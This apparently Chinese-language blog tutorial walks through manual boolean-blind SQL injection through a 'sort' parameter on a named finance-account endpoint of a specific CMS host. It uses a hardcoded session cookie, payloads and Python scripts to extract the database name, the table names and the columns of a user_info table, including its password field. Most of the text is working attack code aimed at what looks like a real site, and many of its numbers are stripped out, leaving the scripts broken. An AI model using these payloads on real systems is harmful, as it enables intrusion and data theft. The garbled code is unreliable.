发现存在sql注入漏洞
简单一点可以直接用sqlmap工具暴库
但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本实现手工猜解数据库
首先hachbar开启
获取cms登录后的sessionid值
开始构造sql payload
获取数据库名的长度:
page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (length(database())=8) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc
手工猜解需要从1往后遍历,当为8时,猜解成功
做sql手工注入的,主要是这个猜解的过程比较麻烦,大量的重复工作,所以需要做成python自动化
实现脚本如下:
# -*- encoding:utf- -*-
#user()
#database()
import requests
cookies={
'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
} string = ''
for i in range(,):
url='http://yucms.hhlyty.cn/finance/account/accountList'
body = {'page': '','rows': '','order': 'desc','sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} #获取数据库名长度
#body = {'page': '', 'rows': '', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} #获取数据库中表的个数
#body = {'page': '', 'rows': '', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} # 获取数据库中表的个数
rs = requests.request("POST", url, cookies=cookies, params=body)
content=rs.content
length = len(content)
#print length if length == :
print ("数据库长度为:%d" %i)
print(rs.text)
#string += j
# break
# print string
#print(rs.text)
猜解数据库完整的名字
payload
page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (substr(database(),,1)=char(71)) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))&order=desc
substr(database(),1,1 ,第一个1,表示字符串的第几位,第二个1,表示截取一位,这样,就可以逐字符猜解
# -*- encoding:utf- -*-
import requests
cookies={
'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
} #dic1='3_abcdefghijklmnopqrstuvwxyz'
dic="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_^~]}\|[{?>=<;:/.-,+*)('&%$#@!" print len(dic) string = ''
for i in range(,):
# leng = len(string)
# if leng == :
for j in dic:
#leng = len(string)
#if leng == 8:
#m=str(ord(j))
#print (m)
m=j
url='http://yucms.hhlyty.cn/finance/account/accountList'
body = {'page': '','rows': '','order': 'desc','sort': '(SELECT (CASE WHEN (substr(database(),{0},1)=char({1})) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))'.format((i),ord(m))}
rs = requests.request("POST", url, cookies=cookies, params=body)
content=rs.content
length = len(content)
#print (j)
print (body)
#print length
if length == :
print ("数据库第%d个字符是:%s:" % (i, j))
m = str(ord(j))
string += j
i=i+
print (m)
print (i)
# n=','
# m += n
# print (m)
break
print ("数据库是:%s" % string) #break print (i)
# print ("数据库第%d个字符是:%s:" % (i,j))
# print ("数据库是:%s" % string) # if length == :
# print ("数据库长度为:%d" %i)
# print(rs.text)
#string += j
# break
# print string #print(rs.text)
猜解表名:
1.猜解第204张表名的长度:
page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)=9) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)
)&order=desc
# -*- encoding:utf- -*-
#user()
#database()
import requests
cookies={
'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
} string = ''
for i in range(,):
url='http://yucms.hhlyty.cn/finance/account/accountList'
#body = {'page': '','rows': '','order': 'desc','sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} #获取数据库名长度
#body = {'page': '', 'rows': '', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} #获取数据库中表的个数
#body = {'page': '', 'rows': '', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} # 获取数据库中表的个数
# body = {'page': '', 'rows': '', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} # 获取数据库中表的个数
body = {'page': '', 'rows': '', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} # 获取数据库中第204张表名的长度
rs = requests.request("POST", url, cookies=cookies, params=body)
content=rs.content
length = len(content)
#print length if length == :
print ("数据库长度为:%d" %i)
print(rs.text)
#string += j
# break
# print string
#print(rs.text)
page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(table_name,,1) from information_schema.tables where table_schema=database() limit ,1)))=) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc
1表示表名的第一个字符
204表示数据库中的第204张表
117表示第一个字符的ascii编码
猜解列名:
1.首先猜测表中字段的个数
page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select count(*) from information_schema.columns where table_schema=database() and table_name='user_info')=) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc
2.逐个字段猜解:
猜解密码字段:
猜解第204张表user_info表第一个字段的长度:
page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(column_name) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)=) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc
猜解第一个列名的长度:
猜解字段名字:
page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(column_name,,1) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)))=) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc
猜解字段名的第一个字符为85
